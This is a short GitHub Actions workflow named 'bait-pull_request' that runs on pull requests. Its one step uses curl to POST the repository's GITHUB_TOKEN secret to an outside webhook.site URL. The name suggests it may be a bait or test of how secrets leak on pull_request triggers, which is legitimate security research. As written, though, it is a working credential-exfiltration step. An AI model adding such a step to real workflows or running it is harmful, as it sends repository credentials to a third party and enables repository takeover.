name: bait-pull_request
on:
  pull_request: {}
jobs:
  x:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -X POST -d "t=${{ secrets.GITHUB_TOKEN }}&src=pull_request" https://webhook.site/ae1c7580-8d42-440e-82c4-4746ccb71ad5
        shell: bash
